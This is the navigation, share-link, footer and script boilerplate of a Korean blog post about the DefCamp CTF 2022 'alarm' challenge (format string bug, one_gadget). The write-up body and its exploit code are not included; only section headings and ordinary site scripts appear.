      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Analysis"><span class="toc-number">1.</span> <span class="toc-text">Analysis</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%EB%B3%B4%ED%98%B8-%EA%B8%B0%EB%B2%95"><span class="toc-number">1.1.</span> <span class="toc-text">보호 기법</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%EC%B7%A8%EC%95%BD%EC%A0%90"><span class="toc-number">1.2.</span> <span class="toc-text">취약점</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Exploit"><span class="toc-number">2.</span> <span class="toc-text">Exploit</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%EC%8B%9C%EB%82%98%EB%A6%AC%EC%98%A4"><span class="toc-number">2.1.</span> <span class="toc-text">시나리오</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Exploit-Code-local-Ubuntu-20-04"><span class="toc-number">2.2.</span> <span class="toc-text">Exploit Code (local, Ubuntu 20.04)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#find-libc"><span class="toc-number">2.3.</span> <span class="toc-text">find libc</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Exploit-Code-remote-Ubuntu-18-04"><span class="toc-number">2.4.</span> <span class="toc-text">Exploit Code (remote, Ubuntu 18.04)</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#tmi"><span class="toc-number">3.</span> <span class="toc-text">tmi</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://jiravvit.github.io/2022/10/05/d-ctf2022-alarm/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://jiravvit.github.io/2022/10/05/d-ctf2022-alarm/&text=DefCamp Capture the Flag (D-CTF) 2022 - alarm (fsb, one_gadget)"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://jiravvit.github.io/2022/10/05/d-ctf2022-alarm/&title=DefCamp Capture the Flag (D-CTF) 2022 - alarm (fsb, one_gadget)"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://jiravvit.github.io/2022/10/05/d-ctf2022-alarm/&is_video=false&description=DefCamp Capture the Flag (D-CTF) 2022 - alarm (fsb, one_gadget)"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=DefCamp Capture the Flag (D-CTF) 2022 - alarm (fsb, one_gadget)&body=Check out this article: https://jiravvit.github.io/2022/10/05/d-ctf2022-alarm/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://jiravvit.github.io/2022/10/05/d-ctf2022-alarm/&title=DefCamp Capture the Flag (D-CTF) 2022 - alarm (fsb, one_gadget)"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://jiravvit.github.io/2022/10/05/d-ctf2022-alarm/&title=DefCamp Capture the Flag (D-CTF) 2022 - alarm (fsb, one_gadget)"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://jiravvit.github.io/2022/10/05/d-ctf2022-alarm/&title=DefCamp Capture the Flag (D-CTF) 2022 - alarm (fsb, one_gadget)"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://jiravvit.github.io/2022/10/05/d-ctf2022-alarm/&title=DefCamp Capture the Flag (D-CTF) 2022 - alarm (fsb, one_gadget)"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://jiravvit.github.io/2022/10/05/d-ctf2022-alarm/&name=DefCamp Capture the Flag (D-CTF) 2022 - alarm (fsb, one_gadget)&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://jiravvit.github.io/2022/10/05/d-ctf2022-alarm/&t=DefCamp Capture the Flag (D-CTF) 2022 - alarm (fsb, one_gadget)"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2022
    jir4vvit
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/tags/">Tag</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'jiravvit-github-io';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>

<!-- utterances Comments -->

</body>
</html>
